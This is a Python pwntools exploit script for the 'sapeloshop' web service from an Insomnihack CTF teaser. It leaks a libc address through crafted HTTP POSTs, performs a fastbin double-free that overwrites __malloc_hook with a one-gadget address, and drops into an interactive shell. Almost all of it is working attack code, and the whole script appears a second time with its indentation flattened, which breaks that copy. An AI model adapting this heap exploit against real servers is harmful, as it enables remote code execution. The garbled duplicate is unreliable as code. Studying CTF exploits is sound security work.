romanking98/exploit_sapeloshop.py

## exploit_sapeloshop.py
#!/usr/bin/python
from pwn import *

elf = ELF("./libc-2.23.so")
#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
r = remote('sapeloshop.teaser.insomnihack.ch', 80)
#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
raw_input()

i = int("3d714", 16)
def get(where):
    global r
    d = "GET %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nConnection: keep-alive\r\n\r\n" % where

    r.write(d)
    o = r.readuntil('Content-Length: ')
    t = r.readline()
    o += t
    sz = int(t.strip())+1
    o += r.recvn(sz)
    print "========== GET", where
    print o
    print "-"*100

    return o

def post(where, what):
    global r
    d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

    r.write(d)
    o = r.readuntil('Content-Length: ')
    t = r.readline()
    o += t
    sz = int(t.strip())+1
    o += r.recvn(sz)
    print "========== POST %s: %s" % (where, what)
    print o
    print "-"*100

    return o

def post2(where, what):
    global r
    d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

    r.write(d)

get("/")
desc1 = "desc="
desc1 += "A"*90
desc2 = "desc="
desc2 += "B"*90
desc3 = "desc="
desc3 += "C"*90


buf1 = "desc="
buf1 += "X"*200

post("/add",buf1)
buf2 = "desc="
buf2 += "Y"*200

post("/add",buf2)

post("/inc","item=0")
post("/sub", "item=0")
post("/sub", "item=0")
post("/inc","item=0")

# Cleanup heap.

leak = post("/del","item=1")

leak = leak.split("><img src=")

for i in range(len(leak)):
	if "col-md-8" in leak[i]:
		leak = leak[i+1]

leak = leak[5:11] + "\x00"*2
leak = u64(leak) - 0x3c4b78

sol = "desc="
sol += "B"*(0x1b0-5)

post("/add",sol)
post("/add","desc=A")

# Start attack.

post("/add", desc1)
post("/add", desc2)
post("/add", desc3)
post("/inc", "item=2")
post("/sub", "item=2")
post("/sub", "item=2")
post("/inc", "item=2")
post("/del", "item=3")
post("/sub", "item=2")

# Fastbin freelist : A -> B -> A
# Control FD of A in first allocation.

# first allocation -- set FD to __malloc_hook.
# 4th allocation will be near __malloc_hook.
fin1 = "desc="
fin1 += "D"*90
malloc_hook = p64(leak + 0x3c4aed)

print hex(leak)
raw_input()

fin2 = "desc="
fin2 += malloc_hook[0:6]
fin2 += "%00%00"  # URL encoding of NULL bytes.
fin2 += "E"*78

fin3 = "desc="
fin3 += "F"*90

fin4 = "desc="
fin4 += "G"*90

fin5 = "desc="
fin5 += "H"*19
system = leak + 0x45216
system = leak + 0xf1147
system = leak + 0xf02a4
fin5 += p64(system)[0:6]
fin5 += "%00%00"
fin5 += "H"*(90-27)

post("/add", fin2)
post("/add", fin3)

post("/add", fin4)
post("/add", fin5)

post2("/add","desc=DASJKDAS")
#post("/sub", "item=0")
#post("/del", "item=1")
#post

r.interactive()
	#!/usr/bin/python
	from pwn import *

	elf = ELF("./libc-2.23.so")
	#r = remote("http://sapeloshop.teaser.insomnihack.ch",80)
	r = remote('sapeloshop.teaser.insomnihack.ch', 80)
	#r = process("./sapeloshop",env={"LD_PRELOAD":"./libc-2.23.so"})
	raw_input()

	i = int("3d714", 16)
	def get(where):
	global r
	d = "GET %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nConnection: keep-alive\r\n\r\n" % where

	r.write(d)
	o = r.readuntil('Content-Length: ')
	t = r.readline()
	o += t
	sz = int(t.strip())+1
	o += r.recvn(sz)
	print "========== GET", where
	print o
	print "-"*100

	return o

	def post(where, what):
	global r
	d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

	r.write(d)
	o = r.readuntil('Content-Length: ')
	t = r.readline()
	o += t
	sz = int(t.strip())+1
	o += r.recvn(sz)
	print "========== POST %s: %s" % (where, what)
	print o
	print "-"*100

	return o

	def post2(where, what):
	global r
	d = "POST %s HTTP/1.1\r\nHost: 127.0.0.1:31337\r\nUser-Agent: pewpew\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: %d\r\nConnection: keep-alive\r\n\r\n%s" % (where, len(what), what)

	r.write(d)

	get("/")
	desc1 = "desc="
	desc1 += "A"*90
	desc2 = "desc="
	desc2 += "B"*90
	desc3 = "desc="
	desc3 += "C"*90


	buf1 = "desc="
	buf1 += "X"*200

	post("/add",buf1)
	buf2 = "desc="
	buf2 += "Y"*200

	post("/add",buf2)

	post("/inc","item=0")
	post("/sub", "item=0")
	post("/sub", "item=0")
	post("/inc","item=0")

	# Cleanup heap.

	leak = post("/del","item=1")

	leak = leak.split("><img src=")

	for i in range(len(leak)):
	if "col-md-8" in leak[i]:
	leak = leak[i+1]

	leak = leak[5:11] + "\x00"*2
	leak = u64(leak) - 0x3c4b78

	sol = "desc="
	sol += "B"*(0x1b0-5)

	post("/add",sol)
	post("/add","desc=A")

	# Start attack.

	post("/add", desc1)
	post("/add", desc2)
	post("/add", desc3)
	post("/inc", "item=2")
	post("/sub", "item=2")
	post("/sub", "item=2")
	post("/inc", "item=2")
	post("/del", "item=3")
	post("/sub", "item=2")

	# Fastbin freelist : A -> B -> A
	# Control FD of A in first allocation.

	# first allocation -- set FD to __malloc_hook.
	# 4th allocation will be near __malloc_hook.
	fin1 = "desc="
	fin1 += "D"*90
	malloc_hook = p64(leak + 0x3c4aed)

	print hex(leak)
	raw_input()

	fin2 = "desc="
	fin2 += malloc_hook[0:6]
	fin2 += "%00%00" # URL encoding of NULL bytes.
	fin2 += "E"*78

	fin3 = "desc="
	fin3 += "F"*90

	fin4 = "desc="
	fin4 += "G"*90

	fin5 = "desc="
	fin5 += "H"*19
	system = leak + 0x45216
	system = leak + 0xf1147
	system = leak + 0xf02a4
	fin5 += p64(system)[0:6]
	fin5 += "%00%00"
	fin5 += "H"*(90-27)

	post("/add", fin2)
	post("/add", fin3)

	post("/add", fin4)
	post("/add", fin5)

	post2("/add","desc=DASJKDAS")
	#post("/sub", "item=0")
	#post("/del", "item=1")
	#post

	r.interactive()